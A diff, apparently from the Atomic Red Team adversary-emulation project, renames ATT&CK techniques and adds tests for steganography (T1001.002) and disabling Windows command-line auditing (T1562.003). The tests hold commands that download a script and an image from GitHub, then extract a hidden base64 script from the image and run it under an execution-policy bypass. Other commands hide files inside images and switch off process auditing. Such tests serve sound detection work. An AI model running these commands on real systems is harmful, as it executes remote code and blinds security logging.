+          New-Item -Path "PathToAtomicsFolder\ExternalPayloads\" -ItemType Directory -Force | Out-Null
+          Write-Output "Downloading Extract-Invoke-PSImage.ps1 script..."
+          $scriptUrl = "https://github.com/raghavsingh7/Extract-Invoke-PSImage/raw/7d8c165d2f9bfe9c3965181079b7c82e03168ce1/Extract-Invoke-PSImage.ps1"
+          Invoke-WebRequest -Uri $scriptUrl -OutFile #{psimage_script}
+      executor:
+        name: powershell
+        elevation_required: true
+        command: "cd \"PathToAtomicsFolder\\ExternalPayloads\\\"\nImport-Module .\\Extract-Invoke-PSImage.ps1\n$extractedScript=Extract-Invoke-PSImage
+          -Image \"#{image_file}\" -Out \"$HOME\\result.ps1\"\n$scriptContent = Get-Content
+          \"$HOME\\result.ps1\" -Raw\n$base64Pattern = \"(?<=^|[^A-Za-z0-9+/])(?:[A-Za-z0-9+/]{4})*(?:[A-Za-z0-9+/]{2}(==)?|[A-Za-z0-9+/]{3}=)?(?=$|[^A-Za-z0-9+/])\"\n$base64Strings
+          = [regex]::Matches($scriptContent, $base64Pattern) | ForEach-Object { $_.Value
+          }\n$base64Strings | Set-Content \"$HOME\\decoded.ps1\"\n$decodedContent
+          = Get-Content \"$HOME\\decoded.ps1\" -Raw\n$decodedText = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($decodedContent))\n$textPattern
+          = '^.+'  \n$textMatches = [regex]::Matches($decodedText, $textPattern) |
+          ForEach-Object { $_.Value }\n$scriptPath = \"$HOME\\textExtraction.ps1\"\n$textMatches
+          -join '' | Set-Content -Path $scriptPath\n. \"$HOME\\textExtraction.ps1\"\n"
+        cleanup_command: "Set-ExecutionPolicy Bypass -Scope Process -Force -ErrorAction
+          Ignore\nRemove-Item -Path \"$HOME\\result.ps1\" -Force -ErrorAction Ignore
+          \nRemove-Item -Path \"$HOME\\textExtraction.ps1\" -Force -ErrorAction Ignore\nRemove-Item
+          -Path \"$HOME\\decoded.ps1\" -Force -ErrorAction Ignore\n"
  T1008:
    technique:
      x_mitre_platforms:
@@ -10550,7 +10550,7 @@ defense-evasion:
  T1562.003:
    technique:
      modified: '2023-03-30T21:01:47.940Z'
-      name: 'Impair Defenses: HISTCONTROL'
+      name: 'Impair Defenses: Impair Command History Logging'
      description: "Adversaries may impair command history logging to hide commands
        they run on a compromised system. Various command interpreters keep track
        of the commands users type in their terminal so that users can retrace what
@@ -43809,7 +43809,7 @@ command-and-control:
          & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
        source_name: University of Birmingham C2
      modified: '2020-03-15T00:37:58.963Z'
-      name: Steganography
+      name: Data Obfuscation via Steganography
      description: 'Adversaries may use steganographic techniques to hide command
        and control traffic to make detection efforts more difficult. Steganographic
        techniques can be used to hide data in digital messages that are transferred
@@ -43831,6 +43831,7 @@ command-and-control:
      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
      x_mitre_data_sources:
      - 'Network Traffic: Network Traffic Content'
+      identifier: T1001.002
    atomic_tests: []
  T1008:
    technique:
@@ -9415,7 +9415,7 @@ defense-evasion:
  T1562.003:
    technique:
      modified: '2023-03-30T21:01:47.940Z'
-      name: 'Impair Defenses: HISTCONTROL'
+      name: 'Impair Defenses: Impair Command History Logging'
      description: "Adversaries may impair command history logging to hide commands
        they run on a compromised system. Various command interpreters keep track
        of the commands users type in their terminal so that users can retrace what
@@ -40465,7 +40465,7 @@ command-and-control:
          & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
        source_name: University of Birmingham C2
      modified: '2020-03-15T00:37:58.963Z'
-      name: Steganography
+      name: Data Obfuscation via Steganography
      description: 'Adversaries may use steganographic techniques to hide command
        and control traffic to make detection efforts more difficult. Steganographic
        techniques can be used to hide data in digital messages that are transferred
@@ -40487,6 +40487,7 @@ command-and-control:
      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
      x_mitre_data_sources:
      - 'Network Traffic: Network Traffic Content'
+      identifier: T1001.002
    atomic_tests: []
  T1008:
    technique:
@@ -7922,7 +7922,7 @@ defense-evasion:
  T1562.003:
    technique:
      modified: '2023-03-30T21:01:47.940Z'
-      name: 'Impair Defenses: HISTCONTROL'
+      name: 'Impair Defenses: Impair Command History Logging'
      description: "Adversaries may impair command history logging to hide commands
        they run on a compromised system. Various command interpreters keep track
        of the commands users type in their terminal so that users can retrace what
@@ -36468,7 +36468,7 @@ command-and-control:
          & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
        source_name: University of Birmingham C2
      modified: '2020-03-15T00:37:58.963Z'
-      name: Steganography
+      name: Data Obfuscation via Steganography
      description: 'Adversaries may use steganographic techniques to hide command
        and control traffic to make detection efforts more difficult. Steganographic
        techniques can be used to hide data in digital messages that are transferred
@@ -36490,6 +36490,7 @@ command-and-control:
      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
      x_mitre_data_sources:
      - 'Network Traffic: Network Traffic Content'
+      identifier: T1001.002
    atomic_tests: []
  T1008:
    technique:
@@ -7922,7 +7922,7 @@ defense-evasion:
  T1562.003:
    technique:
      modified: '2023-03-30T21:01:47.940Z'
-      name: 'Impair Defenses: HISTCONTROL'
+      name: 'Impair Defenses: Impair Command History Logging'
      description: "Adversaries may impair command history logging to hide commands
        they run on a compromised system. Various command interpreters keep track
        of the commands users type in their terminal so that users can retrace what
@@ -36236,7 +36236,7 @@ command-and-control:
          & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
        source_name: University of Birmingham C2
      modified: '2020-03-15T00:37:58.963Z'
-      name: Steganography
+      name: Data Obfuscation via Steganography
      description: 'Adversaries may use steganographic techniques to hide command
        and control traffic to make detection efforts more difficult. Steganographic
        techniques can be used to hide data in digital messages that are transferred
@@ -36258,6 +36258,7 @@ command-and-control:
      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
      x_mitre_data_sources:
      - 'Network Traffic: Network Traffic Content'
+      identifier: T1001.002
    atomic_tests: []
  T1008:
    technique:
@@ -14887,7 +14887,7 @@ defense-evasion:
  T1562.003:
    technique:
      modified: '2023-03-30T21:01:47.940Z'
-      name: 'Impair Defenses: HISTCONTROL'
+      name: 'Impair Defenses: Impair Command History Logging'
      description: "Adversaries may impair command history logging to hide commands
        they run on a compromised system. Various command interpreters keep track
        of the commands users type in their terminal so that users can retrace what
@@ -14972,7 +14972,68 @@ defense-evasion:
      object_marking_refs:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      identifier: T1562.003
-    atomic_tests: []
+    atomic_tests:
+    - name: Disable Windows Command Line Auditing using reg.exe
+      auto_generated_guid: 1329d5ab-e10e-4e5e-93d1-4d907eb656e5
+      description: |
+        In Windows operating systems, command line auditing is controlled through the following registry value:
+
+          Registry Path: HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System\Audit
+          Registry Value: ProcessCreationIncludeCmdLine_Enabled
+
+        When command line auditing is enabled, the system records detailed information about command execution, including the command executed, the user account responsible for executing the command, and the timestamp of the execution.
+        This information is crucial for security monitoring and forensic analysis, as it helps organizations detect and investigate unauthorized or malicious activities within their systems.
+        By default, command line auditing may not be enabled in Windows systems, and administrators must manually configure the appropriate registry settings to activate it.
+        Conversely, attackers may attempt to tamper with these registry keys to disable command line auditing, as part of their efforts to evade detection and cover their tracks while perpetrating malicious activities.
+
+        Because this attack executes reg.exe using a command prompt, this attack can be detected by monitoring both:
+          Process Creation events for reg.exe (Windows Event ID 4688, Sysmon Event ID 1)
+          Registry events (Windows Event ID 4657, Sysmon Event ID 13)
+
+        Read more here:
+        https://securitydatasets.com/notebooks/atomic/windows/defense_evasion/SDWIN-220703123711.html
+      supported_platforms:
+      - windows
+      executor:
+        name: command_prompt
+        elevation_required: true
+        command: |
+          echo Commencing Attack - Disabling Registry Value
+          reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System\Audit /v ProcessCreationIncludeCmdLine_Enabled /t REG_DWORD /d 0 /f
+        cleanup_command: |
+          echo Commencing Cleanup - Restoring Registry Value
+          reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System\Audit /v ProcessCreationIncludeCmdLine_Enabled /t REG_DWORD /d 1 /f
+    - name: Disable Windows Command Line Auditing using Powershell Cmdlet
+      auto_generated_guid: 95f5c72f-6dfe-45f3-a8c1-d8faa07176fa
+      description: |
+        In Windows operating systems, command line auditing is controlled through the following registry value:
+
+          Registry Path: HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System\Audit
+          Registry Value: ProcessCreationIncludeCmdLine_Enabled
+
+        When command line auditing is enabled, the system records detailed information about command execution, including the command executed, the user account responsible for executing the command, and the timestamp of the execution.
+        This information is crucial for security monitoring and forensic analysis, as it helps organizations detect and investigate unauthorized or malicious activities within their systems.
+        By default, command line auditing may not be enabled in Windows systems, and administrators must manually configure the appropriate registry settings to activate it.
+        Conversely, attackers may attempt to tamper with these registry keys to disable command line auditing, as part of their efforts to evade detection and cover their tracks while perpetrating malicious activities.
+
+        Because this attack runs a Powershell cmdlet, this attack can be detected by monitoring both:
+          Powershell Logging (Windows Powershell Event ID 400, 800, 4103, 4104)
+          Registry events (Windows Event ID 4657, Sysmon Event ID 13)
+
+        Read more here:
+        https://securitydatasets.com/notebooks/atomic/windows/defense_evasion/SDWIN-220703123711.html
+        https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.management/new-itemproperty?view=powershell-7.4#example-2-add-a-registry-entry-to-a-key
+      supported_platforms:
+      - windows
+      executor:
+        name: command_prompt
+        elevation_required: true
+        command: |
+          echo "Commencing Attack - Disabling Registry Value"
+          New-ItemProperty -Path "HKLM:Software\Microsoft\Windows\CurrentVersion\Policies\System\Audit" -Name "ProcessCreationIncludeCmdLine_Enabled" -Value 0 -PropertyType DWORD -Force -ErrorAction Ignore
+        cleanup_command: |
+          echo "Commencing Cleanup - Restoring Registry Value"
+          New-ItemProperty -Path "HKLM:Software\Microsoft\Windows\CurrentVersion\Policies\System\Audit" -Name "ProcessCreationIncludeCmdLine_Enabled" -Value 1 -PropertyType DWORD -Force -ErrorAction Ignore
  T1556.008:
    technique:
      modified: '2023-05-04T18:02:51.318Z'
@@ -61248,7 +61309,7 @@ command-and-control:
          & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
        source_name: University of Birmingham C2
      modified: '2020-03-15T00:37:58.963Z'
-      name: Steganography
+      name: Data Obfuscation via Steganography
      description: 'Adversaries may use steganographic techniques to hide command
        and control traffic to make detection efforts more difficult. Steganographic
        techniques can be used to hide data in digital messages that are transferred
@@ -61270,7 +61331,156 @@ command-and-control:
      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
      x_mitre_data_sources:
      - 'Network Traffic: Network Traffic Content'
-    atomic_tests: []
+      identifier: T1001.002
+    atomic_tests:
+    - name: Steganographic Tarball Embedding
+      auto_generated_guid: c7921449-8b62-4c4d-8a83-d9281ac0190b
+      description: "This atomic test, named \"Steganographic Tarball Embedding\",
+        simulates the technique of data obfuscation via steganography by embedding
+        a tar archive file (tarball) \nwithin an image.\n\nThe test begins by ensuring
+        the availability of the image file and the tarball file containing data .
+        It then generates random passwords and saves them to a \nfile. Subsequently,
+        the tarball file is created, containing the passwords file. The test executor
+        command reads the contents of the image \nfile and the tarball file as byte
+        arrays and appends them together to form a new image file. This process effectively
+        embeds the tarball \nfile within the image, utilizing steganography techniques
+        for data obfuscation.\n\nThis atomic test simulates the technique of data
+        obfuscation via steganography, enabling attackers to clandestinely transfer
+        files across systems undetected. \nBy embedding the tarball file within the
+        image, adversaries can obscure their activities, facilitating covert communication
+        and data exfiltration.\n"
+      supported_platforms:
+      - windows
+      input_arguments:
+        image_file:
+          description: Image file which will be downloaded to be used to hide data
+          type: path
+          default: PathToAtomicsFolder\T1001.002\bin\T1001.002.jpg
+        tar_file:
+          description: Tarz file containing random passwords
+          type: path
+          default: "$env:PUBLIC\\Downloads\\T1001.002.tarz"
+        new_image_file:
+          description: new image file ready for extraction
+          type: path
+          default: "$env:PUBLIC\\Downloads\\T1001.002New.jpg"
+        passwords_file:
+          description: Text file containing random passwords
+          type: path
+          default: "$env:TEMP\\random_passwords.txt"
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'Image file must exist
+
+          '
+        prereq_command: |
+          if (!(Test-Path "#{image_file}")) {exit 1} else {
+          {exit 0}
+          }
+        get_prereq_command: |
+          New-Item -Type Directory (split-path "#{image_file}") -ErrorAction ignore | Out-Null
+          Write-Output "Downloading image file..."
+          $imageUrl = "https://github.com/raghavsingh7/Pictures/raw/a9617d9fce289909441120a1e0366315c2c5e19d/lime.jpg"
+          Invoke-WebRequest -Uri $imageUrl -OutFile "#{image_file}"
+      - description: 'File to hide within tarz file must exist
+
+          '
+        prereq_command: |
+          if (!(Test-Path "#{passwords_file}")) {exit 1} else {
+          {exit 0}
+          }
+        get_prereq_command: "Write-Output \"Generating random passwords and saving
+          to file...\"\n$passwords = 1..10 | ForEach-Object { Get-Random -InputObject
+          ('ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*()-_=+[]{}|;:,.<>?')
+          -Count 12 }\n$passwords | Out-File -FilePath \"#{passwords_file}\"    \n"
+      - description: "Tarz file to embed in image must exist \n"
+        prereq_command: |
+          if (!(Test-Path "#{tar_file}")) {exit 1} else {
+          {exit 0}
+          }
+        get_prereq_command: |
+          Write-Output "Generating tarz file..."
+          tar -cvf "#{tar_file}" "#{passwords_file}"
+      executor:
+        name: powershell
+        elevation_required: true
+        command: 'Get-Content "#{image_file}", "#{tar_file}" -Encoding byte -ReadCount
+          0 | Set-Content "#{new_image_file}" -Encoding byte
+
+          '
+        cleanup_command: |
+          Set-ExecutionPolicy Bypass -Scope Process -Force -ErrorAction Ignore
+          Remove-Item -Path "#{new_image_file}" -Force -ErrorAction Ignore
+    - name: Embedded Script in Image Execution via Extract-Invoke-PSImage
+      auto_generated_guid: 04bb8e3d-1670-46ab-a3f1-5cee64da29b6
+      description: "This atomic test demonstrates the technique of data obfuscation
+        via steganography, where a PowerShell script is concealed within an image
+        file. \nThe PowerShell script is embedded using steganography techniques,
+        making it undetectable by traditional security measures. The script is hidden
+        \nwithin the pixels of the image, enabling attackers to covertly transfer
+        and execute malicious code across systems.\n\nThe test begins by ensuring
+        the availability of the malicious image file and the Extract-Invoke-PSImage
+        script. The test proceeds to extract the hidden \nPowerShell script (decoded.ps1)
+        from the image file using the Extract-Invoke-PSImage tool. The extracted script
+        is then decoded from base64 encoding and saved as a \nseparate PowerShell
+        (textExtraction.ps1). Consequently, the textExtraction.ps1 script is executed.\n\nIn
+        the case of this atomic test, the malicious image file which is downloaded
+        has the powershell command Start-Process notepad embedded within in base64.
+        This\nis done to emulate an attackers behaviour in the case they were to execute
+        malware embedded within the image file. \n"
+      supported_platforms:
+      - windows
+      input_arguments:
+        image_file:
+          description: Malicious Image file which will be downloaded
+          type: path
+          default: PathToAtomicsFolder\T1001.002\bin\evil_kitten.jpg
+        psimage_script:
+          description: Extract-Invoke-PSImage Script downloaded
+          type: path
+          default: PathToAtomicsFolder\ExternalPayloads\Extract-Invoke-PSImage.ps1
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'Image file must exist
+
+          '
+        prereq_command: |
+          if (!(Test-Path "#{image_file}")) {exit 1} else {
+          {exit 0}
+          }
+        get_prereq_command: |
+          New-Item -Type Directory (split-path "#{image_file}") -ErrorAction Ignore | Out-Null
+          Write-Output "Downloading image file..."
+          $imageUrl = "https://github.com/raghavsingh7/Pictures/raw/f73e7686cdd848ed06e63af07f6f1a5e72de6320/evil_kitten.jpg"
+          Invoke-WebRequest -Uri $imageUrl -OutFile #{image_file}
+      - description: 'Extract-Invoke-PSImage must exist
+
+          '
+        prereq_command: |
+          if (!(Test-Path "#{psimage_script}")) {exit 1} else {
+          {exit 0}
+          }
+        get_prereq_command: |
+          New-Item -Path "PathToAtomicsFolder\ExternalPayloads\" -ItemType Directory -Force | Out-Null
+          Write-Output "Downloading Extract-Invoke-PSImage.ps1 script..."
+          $scriptUrl = "https://github.com/raghavsingh7/Extract-Invoke-PSImage/raw/7d8c165d2f9bfe9c3965181079b7c82e03168ce1/Extract-Invoke-PSImage.ps1"
+          Invoke-WebRequest -Uri $scriptUrl -OutFile #{psimage_script}
+      executor:
+        name: powershell
+        elevation_required: true
+        command: "cd \"PathToAtomicsFolder\\ExternalPayloads\\\"\nImport-Module .\\Extract-Invoke-PSImage.ps1\n$extractedScript=Extract-Invoke-PSImage
+          -Image \"#{image_file}\" -Out \"$HOME\\result.ps1\"\n$scriptContent = Get-Content
+          \"$HOME\\result.ps1\" -Raw\n$base64Pattern = \"(?<=^|[^A-Za-z0-9+/])(?:[A-Za-z0-9+/]{4})*(?:[A-Za-z0-9+/]{2}(==)?|[A-Za-z0-9+/]{3}=)?(?=$|[^A-Za-z0-9+/])\"\n$base64Strings
+          = [regex]::Matches($scriptContent, $base64Pattern) | ForEach-Object { $_.Value
+          }\n$base64Strings | Set-Content \"$HOME\\decoded.ps1\"\n$decodedContent
+          = Get-Content \"$HOME\\decoded.ps1\" -Raw\n$decodedText = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($decodedContent))\n$textPattern
+          = '^.+'  \n$textMatches = [regex]::Matches($decodedText, $textPattern) |
+          ForEach-Object { $_.Value }\n$scriptPath = \"$HOME\\textExtraction.ps1\"\n$textMatches
+          -join '' | Set-Content -Path $scriptPath\n. \"$HOME\\textExtraction.ps1\"\n"
+        cleanup_command: "Set-ExecutionPolicy Bypass -Scope Process -Force -ErrorAction
+          Ignore\nRemove-Item -Path \"$HOME\\result.ps1\" -Force -ErrorAction Ignore
+          \nRemove-Item -Path \"$HOME\\textExtraction.ps1\" -Force -ErrorAction Ignore\nRemove-Item
+          -Path \"$HOME\\decoded.ps1\" -Force -ErrorAction Ignore\n"
  T1008:
    technique:
      x_mitre_platforms:
@@ -0,0 +1,197 @@
+# T1001.002 - Data Obfuscation via Steganography
+## [Description from ATT&CK](https://attack.mitre.org/techniques/T1001/002)
+<blockquote>Adversaries may use steganographic techniques to hide command and control traffic to make detection efforts more difficult. Steganographic techniques can be used to hide data in digital messages that are transferred between systems. This hidden information can be used for command and control of compromised systems. In some cases, the passing of files embedded using steganography, such as image or document files, can be used for command and control. </blockquote>
+
+## Atomic Tests
+
+- [Atomic Test #1 - Steganographic Tarball Embedding](#atomic-test-1---steganographic-tarball-embedding)
+
+- [Atomic Test #2 - Embedded Script in Image Execution via Extract-Invoke-PSImage](#atomic-test-2---embedded-script-in-image-execution-via-extract-invoke-psimage)
+
+
+<br/>
+
+## Atomic Test #1 - Steganographic Tarball Embedding
+This atomic test, named "Steganographic Tarball Embedding", simulates the technique of data obfuscation via steganography by embedding a tar archive file (tarball) 
+within an image.
+
+The test begins by ensuring the availability of the image file and the tarball file containing data . It then generates random passwords and saves them to a 
+file. Subsequently, the tarball file is created, containing the passwords file. The test executor command reads the contents of the image 
+file and the tarball file as byte arrays and appends them together to form a new image file. This process effectively embeds the tarball 
+file within the image, utilizing steganography techniques for data obfuscation.
+
+This atomic test simulates the technique of data obfuscation via steganography, enabling attackers to clandestinely transfer files across systems undetected. 
+By embedding the tarball file within the image, adversaries can obscure their activities, facilitating covert communication and data exfiltration.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** c7921449-8b62-4c4d-8a83-d9281ac0190b
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| image_file | Image file which will be downloaded to be used to hide data | path | PathToAtomicsFolder&#92;T1001.002&#92;bin&#92;T1001.002.jpg|
+| tar_file | Tarz file containing random passwords | path | $env:PUBLIC&#92;Downloads&#92;T1001.002.tarz|
+| new_image_file | new image file ready for extraction | path | $env:PUBLIC&#92;Downloads&#92;T1001.002New.jpg|
+| passwords_file | Text file containing random passwords | path | $env:TEMP&#92;random_passwords.txt|
+
+
+#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 
+
+
+```powershell
+Get-Content "#{image_file}", "#{tar_file}" -Encoding byte -ReadCount 0 | Set-Content "#{new_image_file}" -Encoding byte
+```
+
+#### Cleanup Commands:
+```powershell
+Set-ExecutionPolicy Bypass -Scope Process -Force -ErrorAction Ignore
+Remove-Item -Path "#{new_image_file}" -Force -ErrorAction Ignore
+```
+
+
+
+#### Dependencies:  Run with `powershell`!
+##### Description: Image file must exist
+##### Check Prereq Commands:
+```powershell
+if (!(Test-Path "#{image_file}")) {exit 1} else {
+{exit 0}
+}
+```
+##### Get Prereq Commands:
+```powershell
+New-Item -Type Directory (split-path "#{image_file}") -ErrorAction ignore | Out-Null
+Write-Output "Downloading image file..."
+$imageUrl = "https://github.com/raghavsingh7/Pictures/raw/a9617d9fce289909441120a1e0366315c2c5e19d/lime.jpg"
+Invoke-WebRequest -Uri $imageUrl -OutFile "#{image_file}"
+```
+##### Description: File to hide within tarz file must exist
+##### Check Prereq Commands:
+```powershell
+if (!(Test-Path "#{passwords_file}")) {exit 1} else {
+{exit 0}
+}
+```
+##### Get Prereq Commands:
+```powershell
+Write-Output "Generating random passwords and saving to file..."
+$passwords = 1..10 | ForEach-Object { Get-Random -InputObject ('ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*()-_=+[]{}|;:,.<>?') -Count 12 }
+$passwords | Out-File -FilePath "#{passwords_file}"
+```
+##### Description: Tarz file to embed in image must exist
+##### Check Prereq Commands:
+```powershell
+if (!(Test-Path "#{tar_file}")) {exit 1} else {
+{exit 0}
+}
+```
+##### Get Prereq Commands:
+```powershell
+Write-Output "Generating tarz file..."
+tar -cvf "#{tar_file}" "#{passwords_file}"
+```
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #2 - Embedded Script in Image Execution via Extract-Invoke-PSImage
+This atomic test demonstrates the technique of data obfuscation via steganography, where a PowerShell script is concealed within an image file. 
+The PowerShell script is embedded using steganography techniques, making it undetectable by traditional security measures. The script is hidden 
+within the pixels of the image, enabling attackers to covertly transfer and execute malicious code across systems.
+
+The test begins by ensuring the availability of the malicious image file and the Extract-Invoke-PSImage script. The test proceeds to extract the hidden 
+PowerShell script (decoded.ps1) from the image file using the Extract-Invoke-PSImage tool. The extracted script is then decoded from base64 encoding and saved as a 
+separate PowerShell (textExtraction.ps1). Consequently, the textExtraction.ps1 script is executed.
+
+In the case of this atomic test, the malicious image file which is downloaded has the powershell command Start-Process notepad embedded within in base64. This
+is done to emulate an attackers behaviour in the case they were to execute malware embedded within the image file.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 04bb8e3d-1670-46ab-a3f1-5cee64da29b6
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| image_file | Malicious Image file which will be downloaded | path | PathToAtomicsFolder&#92;T1001.002&#92;bin&#92;evil_kitten.jpg|
+| psimage_script | Extract-Invoke-PSImage Script downloaded | path | PathToAtomicsFolder&#92;ExternalPayloads&#92;Extract-Invoke-PSImage.ps1|
+
+
+#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 
+
+
+```powershell
+cd "PathToAtomicsFolder\ExternalPayloads\"
+Import-Module .\Extract-Invoke-PSImage.ps1
+$extractedScript=Extract-Invoke-PSImage -Image "#{image_file}" -Out "$HOME\result.ps1"
+$scriptContent = Get-Content "$HOME\result.ps1" -Raw
+$base64Pattern = "(?<=^|[^A-Za-z0-9+/])(?:[A-Za-z0-9+/]{4})*(?:[A-Za-z0-9+/]{2}(==)?|[A-Za-z0-9+/]{3}=)?(?=$|[^A-Za-z0-9+/])"
+$base64Strings = [regex]::Matches($scriptContent, $base64Pattern) | ForEach-Object { $_.Value }
+$base64Strings | Set-Content "$HOME\decoded.ps1"
+$decodedContent = Get-Content "$HOME\decoded.ps1" -Raw
+$decodedText = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($decodedContent))
+$textPattern = '^.+'  
+$textMatches = [regex]::Matches($decodedText, $textPattern) | ForEach-Object { $_.Value }
+$scriptPath = "$HOME\textExtraction.ps1"
+$textMatches -join '' | Set-Content -Path $scriptPath
+. "$HOME\textExtraction.ps1"
+```
+
+#### Cleanup Commands:
+```powershell
+Set-ExecutionPolicy Bypass -Scope Process -Force -ErrorAction Ignore
+Remove-Item -Path "$HOME\result.ps1" -Force -ErrorAction Ignore 
+Remove-Item -Path "$HOME\textExtraction.ps1" -Force -ErrorAction Ignore
+Remove-Item -Path "$HOME\decoded.ps1" -Force -ErrorAction Ignore
+```
+
+
+
+#### Dependencies:  Run with `powershell`!
+##### Description: Image file must exist
+##### Check Prereq Commands:
+```powershell
+if (!(Test-Path "#{image_file}")) {exit 1} else {
+{exit 0}
+}
+```
+##### Get Prereq Commands:
+```powershell
+New-Item -Type Directory (split-path "#{image_file}") -ErrorAction Ignore | Out-Null
+Write-Output "Downloading image file..."
+$imageUrl = "https://github.com/raghavsingh7/Pictures/raw/f73e7686cdd848ed06e63af07f6f1a5e72de6320/evil_kitten.jpg"
+Invoke-WebRequest -Uri $imageUrl -OutFile #{image_file}
+```
+##### Description: Extract-Invoke-PSImage must exist
+##### Check Prereq Commands:
+```powershell
+if (!(Test-Path "#{psimage_script}")) {exit 1} else {
+{exit 0}
+}
+```
+##### Get Prereq Commands:
+```powershell
+New-Item -Path "PathToAtomicsFolder\ExternalPayloads\" -ItemType Directory -Force | Out-Null
+Write-Output "Downloading Extract-Invoke-PSImage.ps1 script..."
+$scriptUrl = "https://github.com/raghavsingh7/Extract-Invoke-PSImage/raw/7d8c165d2f9bfe9c3965181079b7c82e03168ce1/Extract-Invoke-PSImage.ps1"
+Invoke-WebRequest -Uri $scriptUrl -OutFile #{psimage_script}
+```
+
+
+
+
+<br/>
@@ -1,4 +1,4 @@
-# T1562.003 - Impair Defenses: HISTCONTROL
+# T1562.003 - Impair Defenses: Impair Command History Logging
 ## [Description from ATT&CK](https://attack.mitre.org/techniques/T1562/003)
 <blockquote>Adversaries may impair command history logging to hide commands they run on a compromised system. Various command interpreters keep track of the commands users type in their terminal so that users can retrace what they've done. 

@@ -32,6 +32,10 @@ Adversaries may also leverage a [Network Device CLI](https://attack.mitre.org/te

 - [Atomic Test #10 - Setting the HISTIGNORE environment variable](#atomic-test-10---setting-the-histignore-environment-variable)

+- [Atomic Test #11 - Disable Windows Command Line Auditing using reg.exe](#atomic-test-11---disable-windows-command-line-auditing-using-regexe)
+
+- [Atomic Test #12 - Disable Windows Command Line Auditing using Powershell Cmdlet](#atomic-test-12---disable-windows-command-line-auditing-using-powershell-cmdlet)
+

 <br/>

@@ -415,4 +419,103 @@ unset HISTIGNORE



+<br/>
+<br/>
+
+## Atomic Test #11 - Disable Windows Command Line Auditing using reg.exe
+In Windows operating systems, command line auditing is controlled through the following registry value:
+
+  Registry Path: HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System\Audit
+  Registry Value: ProcessCreationIncludeCmdLine_Enabled
+
+When command line auditing is enabled, the system records detailed information about command execution, including the command executed, the user account responsible for executing the command, and the timestamp of the execution.
+This information is crucial for security monitoring and forensic analysis, as it helps organizations detect and investigate unauthorized or malicious activities within their systems.
+By default, command line auditing may not be enabled in Windows systems, and administrators must manually configure the appropriate registry settings to activate it.
+Conversely, attackers may attempt to tamper with these registry keys to disable command line auditing, as part of their efforts to evade detection and cover their tracks while perpetrating malicious activities.
+
+Because this attack executes reg.exe using a command prompt, this attack can be detected by monitoring both:
+  Process Creation events for reg.exe (Windows Event ID 4688, Sysmon Event ID 1)
+  Registry events (Windows Event ID 4657, Sysmon Event ID 13)
+
+Read more here:
+https://securitydatasets.com/notebooks/atomic/windows/defense_evasion/SDWIN-220703123711.html
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 1329d5ab-e10e-4e5e-93d1-4d907eb656e5
+
+
+
+
+
+
+#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
+
+
+```cmd
+echo Commencing Attack - Disabling Registry Value
+reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System\Audit /v ProcessCreationIncludeCmdLine_Enabled /t REG_DWORD /d 0 /f
+```
+
+#### Cleanup Commands:
+```cmd
+echo Commencing Cleanup - Restoring Registry Value
+reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System\Audit /v ProcessCreationIncludeCmdLine_Enabled /t REG_DWORD /d 1 /f
+```
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #12 - Disable Windows Command Line Auditing using Powershell Cmdlet
+In Windows operating systems, command line auditing is controlled through the following registry value:
+
+  Registry Path: HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System\Audit
+  Registry Value: ProcessCreationIncludeCmdLine_Enabled
+
+When command line auditing is enabled, the system records detailed information about command execution, including the command executed, the user account responsible for executing the command, and the timestamp of the execution.
+This information is crucial for security monitoring and forensic analysis, as it helps organizations detect and investigate unauthorized or malicious activities within their systems.
+By default, command line auditing may not be enabled in Windows systems, and administrators must manually configure the appropriate registry settings to activate it.
+Conversely, attackers may attempt to tamper with these registry keys to disable command line auditing, as part of their efforts to evade detection and cover their tracks while perpetrating malicious activities.
+
+Because this attack runs a Powershell cmdlet, this attack can be detected by monitoring both:
+  Powershell Logging (Windows Powershell Event ID 400, 800, 4103, 4104)
+  Registry events (Windows Event ID 4657, Sysmon Event ID 13)
+
+Read more here:
+https://securitydatasets.com/notebooks/atomic/windows/defense_evasion/SDWIN-220703123711.html
